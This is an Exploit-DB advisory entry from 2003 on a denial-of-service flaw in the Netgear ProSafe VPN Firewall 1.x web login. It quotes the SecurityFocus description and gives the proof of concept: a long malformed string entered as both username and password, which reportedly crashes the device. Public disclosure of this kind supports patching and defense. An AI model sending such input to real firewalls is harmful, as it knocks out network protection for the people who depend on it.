Netgear 1.x ProSafe VPN Firewall Web Interface Login Denial of Service Vulnerability

2003-03-21T00:00:00
ID EDB-ID:22407
Type exploitdb
Reporter Paul Kurczaba
Modified 2003-03-21T00:00:00

Description

Netgear 1.x ProSafe VPN Firewall Web Interface Login Denial Of Service Vulnerability. Dos exploit for hardware platform

                                        
                                            source: http://www.securityfocus.com/bid/7166/info

It has been reported that some ProSafe VPN Firewall devices do not properly handle some types of input. Because of this, a remote user could potentially send malicious input to the device that would result in a crash, and potential denial of service.


Username: 7097097230984720938472839ujsksodpckf0we9okzxck90zxcpzxc

Password: 7097097230984720938472839ujsksodpckf0we9okzxck90zxcpzxc